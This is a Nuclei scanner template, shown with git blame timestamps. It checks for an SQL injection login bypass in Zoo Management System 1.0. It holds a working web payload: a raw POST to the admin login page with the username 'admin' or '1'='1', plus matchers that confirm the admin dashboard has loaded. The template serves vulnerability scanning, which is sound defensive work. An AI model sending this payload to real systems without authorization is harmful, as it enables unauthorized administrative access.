nuclei-templates/vulnerabilities/other/zms-sqli.yaml

39 lines
889 B
YAML
Raw Normal View History

2022-07-25 18:17:14 +00:00
id: zms-sqli
info:
name: Zoo Management System (ZMS) 1.0 - SQLi Authentication Bypass
author: arafatansari
severity: high
description: |
Zoo Management System Login page can be bypassed with a simple SQLi to the username parameter.
reference:
- https://www.exploit-db.com/exploits/48880
2022-07-26 04:35:07 +00:00
metadata:
verified: true
tags: zms,sqli,auth-bypass,cms,edb
2022-07-25 18:17:14 +00:00
requests:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271&password=any&login=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-25 18:25:18 +00:00
- 'ZMS ADMIN'
2022-07-25 18:20:46 +00:00
- 'Dashboard'
2022-07-25 18:17:14 +00:00
- 'Zoo Management System'
2022-07-25 18:25:18 +00:00
condition: and
2022-07-25 18:17:14 +00:00
- type: status
status:
2022-07-25 18:20:46 +00:00
- 200